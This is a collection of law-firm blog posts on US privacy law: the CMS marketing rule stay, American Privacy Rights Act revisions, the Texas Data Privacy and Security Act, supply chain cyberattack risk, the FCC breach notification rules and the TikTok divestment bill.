“Arbitrary and Capricious” – A Sign of Things to Come?

On July 3, 2024, the US District Court of Northern Texas issued a Memorandum Opinion and Order in the combined cases of Americans for Beneficiary Choice, et al. v. United States Department of Health and Human Services (Civ. Action No. 4:24-cv-00439) and Council for Medicare Council, et al., v. United States Department of Health and Human Services (Civ. Action No. 4:24-cv-00446).

The Plaintiffs (in this combined case) challenged the Centers for Medicare and Medicaid Services (“CMS”) rule issued earlier this year. The new rules attempt to place reimbursements to third-party firms into the definition of compensation where the prior rules did not include reimbursements into the definition of compensation which would have been subject to the regulatory cap on compensation.

This Memorandum Opinion Order granted the Plaintiffs’ Motion for a Stay in part and denied it in part. The Motion was granted in relation to the new CMS rules around compensation paid by Medicare Advantage and Part D plans to independent agents and brokers who help beneficiaries select and enroll in private plans.

The Court found that the compensation changes were arbitrary and capricious and that the Plaintiffs were substantially likely to succeed on the merits of the case. The Court found that CMS failed to substantiate key parts of the final rule. During the rulemaking process, industry commenters asked for clarification around parts of the rule, but CMS claimed “the sources Plaintiffs criticized were not significant enough to warrant defending them.” The Court found “because CMS failed to address important problems to their central evidence…that members of the public raised during the comment period, those aspects of the Final Rule are most likely arbitrary and capricious.”

One of the Plaintiffs, Americans for Beneficiary Choice, also challenged the consent requirement of the final rule. The final rule states that personal beneficiary data collected by a third party marketing organization (“TPMO”) can only be shared with another TPMO if the beneficiary gives prior express written consent. The Plaintiff argued that the consent requirement is “in tension with HIPAA’s broader purpose of facilitating data sharing” and CMS stated that HIPAA might facilitate data sharing, but that does not limit CMS’s ability to limit certain harmful data-sharing practices. The Court denied the Motion to Stay regarding the consent requirement, but interestingly stated that Plaintiff’s “claim regarding the Consent Requirement may ultimately have merit, [Plaintiff]’s current briefing does not demonstrate a substantial likelihood of success at this stage”.

What does this mean now that we are less than 90 days from the start of the 2025 Medicare Advantage/Part D contract year?

  1. The consent requirement is still moving forward – While the memorandum order hints at the possibility of it being rejected, as of right now, TPMO’s must get prior express written consent before sharing personal beneficiary data with another TPMO.
  2. The fixed-fee and contract-terms restrictions in the final rule have had their effective date’s stayed until this suit is resolved. Therefore, the compensation scheme that was in place last year is essentially the same for those two sections.

How does this affect the FCC’s 1:1 Ruling?

It doesn’t. While this case does show that courts are willing to look critically at agencies’s rulemaking process, the FCC’s 1:1 consent requirement is different than the compensation changes set forth by CMS.

The FCC arguably just clarified the existing rule around prior express written consent by requiring the consent to “authorize no more than one identified seller”.

CMS, on the other hand, attempted to make wholesale changes and “began to set fixed rates for a wide range of administrative payments that were previously uncapped and unregulated as compensation.”

There is still the IMC case against the FCC , so there is the possibility (albeit small) there could be relief coming in that case. However, the advice here is to continue planning for obtaining consent to share personal beneficiary data AND single seller consent.

House Committee Postpones Markup Amid New Privacy Bill Updates

On June 27, 2024, the U.S. House of Representatives cancelled the House Energy and Commerce Committee markup of the American Privacy Rights Act (“APRA” or “Bill”) scheduled for that day, reportedly with little notice. There has been no indication of when the markup will be rescheduled; however, House Energy and Commerce Committee Chairwoman Cathy McMorris Rodgers issued a statement reiterating her support for the legislation.

On June 20, 2024, the House posted a third version of the discussion draft of the APRA. On June 25, 2024, two days before the scheduled markup session, Committee members introduced the APRA as a bill, H.R. 8818. Each version featured several key changes from earlier drafts, which are outlined collectively, below.

Notable changes in H.R. 8818 include the removal of two key sections:

  • “Civil Rights and Algorithms,” which required entities to conduct covered algorithm impact assessments when algorithms posed a consequential risk of harm to individuals or groups; and
  • “Consequential Decision Opt-Out,” which allowed individuals to opt out of being subjected to covered algorithms.

Additional changes include the following:

  • The Bill introduces new definitions, such as “coarse geolocation information” and “online activity profile,” the latter of which refines a category of sensitive data. “Neural data” and “information that reveals the status of an individual as a member of the Armed Forces” are added as new categories of sensitive data. The Bill also modifies the definitions of “contextual advertising” and “first-party advertising.”
  • The data minimization section includes a number of changes, such as the addition of “conduct[ing] medical research” in compliance with applicable federal law as a new permitted purpose. The Bill also limits the ability to rely on permitted purposes in processing sensitive covered data, biometric and genetic information.
  • The Bill now allows not only covered entities (excluding data brokers or large data holders), but also service providers (that are not large data holders) to apply for the Federal Trade Commission-approved compliance guideline mechanism.
  • Protections for covered minors now include a prohibition on first-party advertising (in addition to targeted advertising) if the covered entity knows the individual is a minor, with limited exceptions acknowledged by the Bill. It also restricts the transfer of a minor’s covered data to third parties.
  • The Bill adds another preemption clause, clarifying that APRA would preempt any state law providing protections for children or teens to the extent such laws conflict with the Bill, but does not prohibit states from enacting laws, rules or regulations that offer greater protection to children or teens than the APRA.

For additional information about the changes, please refer to the unofficial redline comparison of all APRA versions published by the IAPP.

The Privacy Patchwork: Beyond US State “Comprehensive” Laws

We’ve cautioned before about the danger of thinking only about US state “comprehensive” laws when looking to legal privacy and data security obligations in the United States. We’ve also mentioned that the US has a patchwork of privacy laws. That patchwork is found to a certain extent outside of the US as well. What laws exist in the patchwork that relate to a company’s activities?

There are laws that apply when companies host websites, including the most well-known, the California Privacy Protection Act (CalOPPA). It has been in effect since July 2004, thus predating COPPA by 14 years. Then there are laws the apply if a company is collecting and using biometric identifiers, like Illinois’ Biometric Information Privacy Act.

Companies are subject to specific laws both in the US and elsewhere when engaging in digital communications. These laws include the US federal laws TCPA and TCFAPA, as well as CAN-SPAM. Digital communication laws exist in countries as wide ranging as Australia, Canada, Morocco, and many others. Then we have laws that apply when collecting information during a credit card transaction, like the Song Beverly Credit Card Act (California).

Putting It Into Practice: When assessing your company’s obligations under privacy and data security laws, keep activity specific privacy laws in mind. Depending on what you are doing, and in what jurisdictions, you may have more obligations to address than simply those found in comprehensive privacy laws.

American Privacy Rights Act Advances with Significant Revisions

On May 23, 2024, the U.S. House Committee on Energy and Commerce Subcommittee on Data, Innovation, and Commerce approved a revised draft of the American Privacy Rights Act (“APRA”), which was released just 36 hours before the markup session. With the subcommittee’s approval, the APRA will now advance to full committee consideration. The revised draft includes several notable changes from the initial discussion draft, including:

  • New Section on COPPA 2.0 – the revised APRA draft includes the Children’s Online Privacy Protection Act (COPPA 2.0) under Title II, which differs to a certain degree from the COPPA 2.0 proposal currently before the Senate (e.g., removal of the revised “actual knowledge” standard; removal of applicability to teens over age 12 and under age 17).
  • New Section on Privacy By Design – the revised APRA draft includes a new dedicated section on privacy by design. This section requires covered entities, service providers and third parties to establish, implement, and maintain reasonable policies, practices and procedures that identify, assess and mitigate privacy risks related to their products and services during the design, development and implementation stages, including risks to covered minors.
  • Expansion of Public Research Permitted Purpose – as an exception to the general data minimization obligation, the revised APRA draft adds another permissible purpose for processing data for public or peer-reviewed scientific, historical, or statistical research projects. These research projects must be in the public interest and comply with all relevant laws and regulations. If the research involves transferring sensitive covered data, the revised APRA draft requires the affirmative express consent of the affected individuals.
  • Expanded Obligations for Data Brokers – the revised APRA draft expands obligations for data brokers by requiring them to include a mechanism for individuals to submit a “Delete My Data” request. This mechanism, similar to the California Delete Act, requires data brokers to delete all covered data related to an individual that they did not collect directly from that individual, if the individual so requests.
  • Changes to Algorithmic Impact Assessments – while the initial APRA draft required large data holders to conduct and report a covered algorithmic impact assessment to the FTC if they used a covered algorithm posing a consequential risk of harm to individuals, the revised APRA requires such impact assessments for covered algorithms to make a “consequential decision.” The revised draft also allows large data holders to use certified independent auditors to conduct the impact assessments, directs the reporting mechanism to NIST instead of the FTC, and expands requirements related to algorithm design evaluations.
  • Consequential Decision Opt-Out – while the initial APRA draft allowed individuals to invoke an opt-out right against covered entities’ use of a covered algorithm making or facilitating a consequential decision, the revised draft now also allows individuals to request that consequential decisions be made by a human.
  • New and/or Revised Definitions – the revised APRA draft’s definition section includes new terms, such as “contextual advertising” and “first party advertising.”. The revised APRA draft also redefines certain terms, including “covered algorithm,” “sensitive covered data,” “small business” and “targeted advertising.”

On July 1, 2024, Texas May Have the Strongest Consumer Data Privacy Law in the United States

It’s Bigger. But is it Better?

They say everything is bigger in Texas which includes big privacy protection. After the Texas Senate approved HB 4 — the Texas Data Privacy and Security Act (“TDPSA”), on June 18, 2023, Texas became the eleventh state to enact comprehensive privacy legislation.[1]

Like many state consumer data privacy laws enacted this year, TDPSA is largely modeled after the Virginia Consumer Data Protection Act.[2] However, the law contains several unique differences and drew significant pieces from recently enacted consumer data privacy laws in Colorado and Connecticut, which generally include “stronger” provisions than the more “business-friendly” laws passed in states like Utah and Iowa.

Some of the more notable provisions of the bill are described below:

More Scope Than You Can Shake a Stick At!

  • The TDPSA applies much more broadly than any other pending or effective state consumer data privacy act, pulling in individuals as well as businesses regardless of their revenues or the number of individuals whose personal data is processed or sold.
  • The TDPSA applies to any individual or business that meets all of the following criteria:
    • conduct business in Texas (or produce goods or services consumed in Texas) and,
    •  process or sell personal data:
      • The “processing or sale of personal data” further expands the applicability of the TDPSA to include individuals and businesses that engage in any operations involving personal data, such as the “collection, use, storage, disclosure, analysis, deletion, or modification of personal data.”
      • In short, collecting, storing or otherwise handling the personal data of any resident of Texas, or transferring that data for any consideration, will likely meet this standard.
  • Uniquely, the carveout for “small businesses” excludes from coverage those entities that meet the definition of “a small business as defined by the United States Small Business Administration.”[3]
  • The law requires all businesses, including small businesses, to obtain opt-in consent before processing sensitive personal data.
  • Similar to other state comprehensive privacy laws, TDPSA excludes state agencies or political subdivisions of Texas, financial institutions subject to Title V of the Gramm-Leach-Bliley Act, covered entities and business associates governed by HIPAA, nonprofit organizations, and institutions of higher education. But, TDPSA uniquely excludes electric utilities, power generation companies, and retail electric providers, as defined under Section 31.002 of the Texas Utilities Code.
  • Certain categories of information are also excluded, including health information protected by HIPAA or used in connection with human clinical trials, and information covered by the Fair Credit Reporting Act, the Driver’s Privacy Protection Act, the Family Educational Rights and Privacy Act of 1974, the Farm Credit Act of 1971, emergency contact information used for emergency contact purposes, and data necessary to administer benefits.

Don’t Mess with Texas Consumers

Texas’s longstanding libertarian roots are evidenced in the TDPSA’s strong menu of individual consumer privacy rights, including the right to:

  • Confirm whether a controller is processing the consumer’s personal data and accessing that data;
  • Correct inaccuracies in the consumer’s personal data, considering the nature of the data and the purposes of the processing;
  • Delete personal data provided by or obtained about the consumer;
  • Obtain a copy of the consumer’s personal data that the consumer previously provided to a controller in a portable and readily usable format, if the data is available digitally and it is technically feasible; and
  • Opt-out of the processing of personal data for purposes of targeted advertising, the sale of personal data, or profiling in furtherance of a decision that produces legal or similarly significant legal effects concerning the consumer.

Data controllers are required to respond to consumer requests within 45 days, which may be extended by 45 days when reasonably necessary. The bill would also give consumers a right to appeal a controller’s refusal to respond to a request.

Controller Hospitality

The Texas bill imposes a number of obligations on data controllers, most of which are similar to other state consumer data privacy laws:

  • Data Minimization – Controllers should limit data collection to what is “adequate, relevant, and reasonably necessary” to achieve the purposes of collection that have been disclosed to a consumer. Consent is required before processing information in ways that are not reasonably necessary or not compatible with the purposes disclosed to a consumer.
  • Nondiscrimination – Controllers may not discriminate against a consumer for exercising individual rights under the TDPSA, including by denying goods or services, charging different rates, or providing different levels of quality.
  • Sensitive Data – Consent is required before processing sensitive data, which includes personal data revealing racial or ethnic origin, religious beliefs, mental or physical health diagnosis, citizenship or immigration status, genetic or biometric data processed for purposes of uniquely identifying an individual; personal data collected from a child known to be under the age of 13, and precise geolocation data.
    • The Senate version of the bill excludes data revealing “sexual orientation” from the categories of sensitive information, which differs from all other state consumer data privacy laws.
  • Privacy Notice – Controllers must post a privacy notice (e.g. website policy) that includes (1) the categories of personal data processed by the controller (including any sensitive data), (2) the purposes for the processing, (3) how consumers may exercise their individual rights under the Act, including the right of appeal, (4) any categories of personal data that the controller shares with third parties and the categories of those third parties, and (5) a description of the methods available to consumers to exercise their rights (e.g., website form or email address).
  • Targeted Advertising – A controller that sells personal data to third parties for purposes of targeted advertising must clearly and conspicuously disclose to consumers their right to opt-out.

Assessing the Privacy of Texans

Unlike some of the “business-friendly” privacy laws in Utah and Iowa, the Texas bill requires controllers to conduct data protection assessments (“Data Privacy Protection Assessments” or “DPPAs) for certain types of processing that pose heightened risks to consumers. The assessments must identify and weigh the benefits of the processing to the controller, the consumer, other stakeholders, and the public against the potential risks to the consumer as mitigated by any safeguards that could reduce those risks. In Texas, the categories that require assessments are identical to those required by Connecticut’s consumer data privacy law and include:

  • Processing personal data for targeted advertising;
  • The sale of personal data;
  • Processing personal data for profiling consumers, if such profiling presents a reasonably foreseeable risk to consumers of unfair or deceptive treatment, disparate impact, financial, physical or reputational injury, physical or other intrusion upon seclusion of private affairs, or “other substantial injury;”
  • Processing of sensitive data; and
  • Any processing activities involving personal data that present a “heightened risk of harm to consumers.”

Opting Out and About

Businesses are required to recognize a universal opt-out mechanism for consumers (or, Global Privacy Control signal), similar to provisions required in Colorado, Connecticut, California, and Montana, but it would also allow businesses more leeway to ignore those signals if it cannot verify the consumers’ identity or lacks the technical ability to receive it.

Show Me Some Swagger!

The Attorney General has the exclusive right to enforce the law, punishable by civil penalties of up to $7,500 per violation. Businesses have a 30-day right to cure violations upon written notice from the Attorney General. Unlike several other laws, the right to cure has no sunset provision and would remain a permanent part of the law. The law does not include a private right of action.

Next Steps for TDPSA Compliance

For businesses that have already developed a state privacy compliance program, especially those modeled around Colorado and Connecticut, making room for TDPSA will be a streamlined exercise. However, businesses that are starting from ground zero, especially “small businesses” defined in the law, need to get moving.

If TDPSA is your first ride in a state consumer privacy compliance rodeo, some first steps we recommend are:

  1. Update your website privacy policy for facial compliance with the law and make sure that notice is being given at or before the time of collection.
  2. Put procedures in place to respond to consumer privacy requests and ask for consent before processing sensitive information
  3. Gather necessary information to complete data protection assessments.
  4. Identify vendor contracts that should be updated with mandatory data protection terms.

Footnotes

[1] As of date of publication, there are now 17 states that have passed state consumer data privacy laws (California, Colorado, Connecticut, Delaware, Florida, Indiana, Iowa, Kentucky, Maryland, Massachusetts, Montana, New Jersey, New Hampshire, Tennessee, Texas, Utah, Virginia) and two (Vermont and Minnesota) that are pending.

[2] See, Code of Virginia Code – Chapter 53. Consumer Data Protection Act

[3] This is notably broader than other state privacy laws, which establish threshold requirements based on revenues or the amount of personal data that a business processes. It will also make it more difficult to know what businesses are covered because SBA definitions vary significantly from one industry vertical to another. As a quick rule of thumb, under the current SBA size standards, a U.S. business with annual average receipts of less than $2.25 million and fewer than 100 employees will likely be small, and therefore exempt from the TDPSA’s primary requirements.

For more news on State Privacy Laws, visit the NLR Consumer Protection and Communications, Media & Internet sections.

Mid-Year Recap: Think Beyond US State Laws!

Much of the focus on US privacy has been US state laws, and the potential of a federal privacy law. This focus can lead one to forget, however, that US privacy and data security law follows a patchwork approach both at a state level and a federal level. “Comprehensive” privacy laws are thus only one piece of the puzzle. There are federal and state privacy and security laws that apply based on a company’s (1) industry (financial services, health care, telecommunications, gaming, etc.), (2) activity (making calls, sending emails, collecting information at point of purchase, etc.), and (3) the type of individual from whom information is being collected (children, students, employees, etc.). There have been developments this year in each of these areas.

On the industry law, there has been activity focused on data brokers, those in the health space, and for those that sell motor vehicles. The FTC has focused on the activities of data brokers this year, beginning the year with a settlement with lead-generation company Response Tree. It also settled with X-Mode Social over the company’s collection and use of sensitive information. There have also been ongoing regulation and scrutiny of companies in the health space, including HHS’s new AI transparency rule. Finally, in this area is a new law in Utah, with a Motor Vehicle Data Protection Act applicable to data systems used by car dealers to house consumer information.

On the activity side, there has been less news, although in this area the “activity” of protecting information (or failing to do so) has continued to receive regulatory focus. This includes the SEC’s new cybersecurity reporting obligations for public companies, as well as minor modifications to Utah’s data breach notification law.

Finally, there have been new laws directed to particular individuals. In particular, laws intended to protect children. These include social media laws in Florida and Utah, effective January 1, 2025 and October 1, 2024 respectively. These are similar to attempts to regulate social media’s collection of information from children in Arkansas, California, Ohio and Texas, but the drafters hope sufficiently different to survive challenges currently being faced by those laws. The FTC is also exploring updates to its decades’ old Children’s Online Privacy Protection Act.

Putting It Into Practice: As we approach the mid-point of the year, now is a good time to look back at privacy developments over the past six months. There have been many developments in the privacy patchwork, and companies may want to take the time now to ensure that their privacy programs have incorporated and addressed those laws’ obligations.

Listen to this post

Congress Introduces Promising Bipartisan Privacy Bill

U.S. Senator Maria Cantwell (D-WA) and U.S. Representative Cathy McMorris Rodgers (R-WA) have made a breakthrough by agreeing on a bipartisan data privacy legislation proposal. The legislation aims to address concerns related to consumer data collection by technology companies and empower individuals to have control over their personal information.

The proposed legislation aims to restrict the amount of data technology companies can gather from consumers. This step is particularly important given the large amount of data these technology companies possess. It would grant Americans the authority to prevent the sale of their personal information or request its deletion. This step gives individuals more control over their personal data. The Federal Trade Commission (FTC) and state attorneys general would be given significant authority to monitor and regulate matters related to consumer privacy. This measure will ensure that the government has a say in matters associated with consumer privacy. The bill includes robust enforcement measures, such as granting individuals the right to take legal action. This step is necessary to ensure that any violations of the legislation are dealt with effectively. While targeted advertising would not be prohibited, the proposed legislation would allow consumers to opt out of it. This step gives consumers more control over the ads they receive. The privacy violations listed in the legislation would also be applicable to telecommunications companies. This measure ensures that no company is exempt from consumer privacy laws. Annual assessments of algorithms would be conducted to ensure that they do not harm individuals, particularly young people. This is an important, step given the rise of technology and its impact on consumers, especially among younger generations.

The bipartisan proposal for data privacy legislation is a positive step forward in terms of consumer privacy in America. While there is still work to be done, it is essential that the government takes proactive steps to ensure that individuals have greater control over their personal data. This is a positive development for the tech industry and consumers alike.

However, as we reported on before, this is not the first time Congress has made strides towards comprehensive data privacy legislation,). Hopefully, this new bipartisan bill will enjoy more success than past efforts and bring the United States closer in line with international data privacy standards.

Supply Chains are the Next Subject of Cyberattacks

The cyberthreat landscape is evolving as threat actors develop new tactics to keep up with increasingly sophisticated corporate IT environments. In particular, threat actors are increasingly exploiting supply chain vulnerabilities to reach downstream targets.

The effects of supply chain cyberattacks are far-reaching, and can affect downstream organizations. The effects can also last long after the attack was first deployed. According to an Identity Theft Resource Center report, “more than 10 million people were impacted by supply chain attacks targeting 1,743 entities that had access to multiple organizations’ data” in 2022. Based upon an IBM analysis, the cost of a data breach averaged $4.45 million in 2023.

What is a supply chain cyberattack?

Supply chain cyberattacks are a type of cyberattack in which a threat actor targets a business offering third-party services to other companies. The threat actor will then leverage its access to the target to reach and cause damage to the business’s customers. Supply chain cyberattacks may be perpetrated in different ways.

  • Software-Enabled Attack: This occurs when a threat actor uses an existing software vulnerability to compromise the systems and data of organizations running the software containing the vulnerability. For example, Apache Log4j is an open source code used by developers in software to add a function for maintaining records of system activity. In November 2021, there were public reports of a Log4j remote execution code vulnerability that allowed threat actors to infiltrate target software running on outdated Log4j code versions. As a result, threat actors gained access to the systems, networks, and data of many organizations in the public and private sectors that used software containing the vulnerable Log4j version. Although security upgrades (i.e., patches) have since been issued to address the Log4j vulnerability, many software and apps are still running with outdated (i.e., unpatched) versions of Log4j.
  • Software Supply Chain Attack: This is the most common type of supply chain cyberattack, and occurs when a threat actor infiltrates and compromises software with malicious code either before the software is provided to consumers or by deploying malicious software updates masquerading as legitimate patches. All users of the compromised software are affected by this type of attack. For example, Blackbaud, Inc., a software company providing cloud hosting services to for-profit and non-profit entities across multiple industries, was ground zero for a software supply chain cyberattack after a threat actor deployed ransomware in its systems that had downstream effects on Blackbaud’s customers, including 45,000 companies. Similarly in May 2023, Progress Software’s MOVEit file-transfer tool was targeted with a ransomware attack, which allowed threat actors to steal data from customers that used the MOVEit app, including government agencies and businesses worldwide.

Legal and Regulatory Risks

Cyberattacks can often expose personal data to unauthorized access and acquisition by a threat actor. When this occurs, companies’ notification obligations under the data breach laws of jurisdictions in which affected individuals reside are triggered. In general, data breach laws require affected companies to submit notice of the incident to affected individuals and, depending on the facts of the incident and the number of such individuals, also to regulators, the media, and consumer reporting agencies. Companies may also have an obligation to notify their customers, vendors, and other business partners based on their contracts with these parties. These reporting requirements increase the likelihood of follow-up inquiries, and in some cases, investigations by regulators. Reporting a data breach also increases a company’s risk of being targeted with private lawsuits, including class actions and lawsuits initiated by business customers, in which plaintiffs may seek different types of relief including injunctive relief, monetary damages, and civil penalties.

The legal and regulatory risks in the aftermath of a cyberattack can persist long after a company has addressed the immediate issues that caused the incident initially. For example, in the aftermath of the cyberattack, Blackbaud was investigated by multiple government authorities and targeted with private lawsuits. While the private suits remain ongoing, Blackbaud settled with state regulators ($49,500,000), the U.S. Federal Trade Commission, and the U.S. Securities Exchange Commission (SEC) ($3,000,000) in 2023 and 2024, almost four years after it first experienced the cyberattack. Other companies that experienced high-profile cyberattacks have also been targeted with securities class action lawsuits by shareholders, and in at least one instance, regulators have named a company’s Chief Information Security Officer in an enforcement action, underscoring the professional risks cyberattacks pose to corporate security leaders.

What Steps Can Companies Take to Mitigate Risk?

First, threat actors will continue to refine their tactics and techniques. Thus, all organizations must adapt and stay current with all regulations and legislation surrounding cybersecurity. Cybersecurity and Infrastructure Security Agency (CISA) urges developer education for creating secure code and verifying third-party components.

Second, stay proactive. Organizations must re-examine not only their own security practices but also those of their vendors and third-party suppliers. If third and fourth parties have access to an organization’s data, it is imperative to ensure that those parties have good data protection practices.

Third, companies should adopt guidelines for suppliers around data and cybersecurity at the outset of a relationship since it may be difficult to get suppliers to adhere to policies after the contract has been signed. For example, some entities have detailed processes requiring suppliers to inform of attacks and conduct impact assessments after the fact. In addition, some entities expect suppliers to follow specific sequences of steps after a cyberattack. At the same time, some entities may also apply the same threat intelligence that it uses for its own defense to its critical suppliers, and may require suppliers to implement proactive security controls, such as incident response plans, ahead of an attack.

Finally, all companies should strive to minimize threats to their software supply by establishing strong security strategies at the ground level.

FCC Updated Data Breach Notification Rules Go into Effect Despite Challenges

On March 13, 2024, the Federal Communications Commission’s updates to the FCC data breach notification rules (the “Rules”) went into effect. They were adopted in December 2023 pursuant to an FCC Report and Order (the “Order”).

The Rules went into effect despite challenges brought in the United States Court of Appeals for the Sixth Circuit. Two trade groups, the Ohio Telecom Association and the Texas Association of Business, petitioned the United States Court of Appeals for the Sixth Circuit and Fifth Circuit, respectively, to vacate the FCC’s Order modifying the Rules. The Order was published in the Federal Register on February 12, 2024, and the petitions were filed shortly thereafter. The challenges, which the United States Panel on Multidistrict Litigation consolidated to the Sixth Circuit, argue that the Rules exceed the FCC’s authority and are arbitrary and capricious. The Order addresses the argument that the Rules are “substantially the same” as breach rules nullified by Congress in 2017. The challenges, however, have not progressed since the Rules went into effect.

Read our previous blog post to learn more about the Rules.

Listen to this post

U.S. House of Representatives Passes Bill to Ban TikTok Unless Divested from ByteDance

Yesterday, with broad bipartisan support, the U.S. House of Representatives voted overwhelmingly (352-65) to support the Protecting Americans from Foreign Adversary Controlled Applications Act, designed to begin the process of banning TikTok’s use in the United States. This is music to my ears. See a previous blog post on this subject.

The Act would penalize app stores and web hosting services that host TikTok while it is owned by Chinese-based ByteDance. However, if the app is divested from ByteDance, the Act will allow use of TikTok in the U.S.

National security experts have warned legislators and the public about downloading and using TikTok as a national security threat. This threat manifests because the owner of ByteDance is required by Chinese law to share users’ data with the Chinese Communist government. When downloading the app, TikTok obtains access to users’ microphones, cameras, and location services, which is essentially spyware on over 170 million Americans’ every move, (dance or not).

Lawmakers are concerned about the detailed sharing of Americans’ data with one of its top adversaries and the ability of TikTok’s algorithms to influence and launch disinformation campaigns against the American people. The Act will make its way through the Senate, and if passed, President Biden has indicated that he will sign it. This is a big win for privacy and national security.

Copyright © 2024 Robinson & Cole LLP. All rights reserved.
by: Linn F. Freedman of Robinson & Cole LLP

For more news on Social Media Legislation, visit the NLR Communications, Media & Internet section.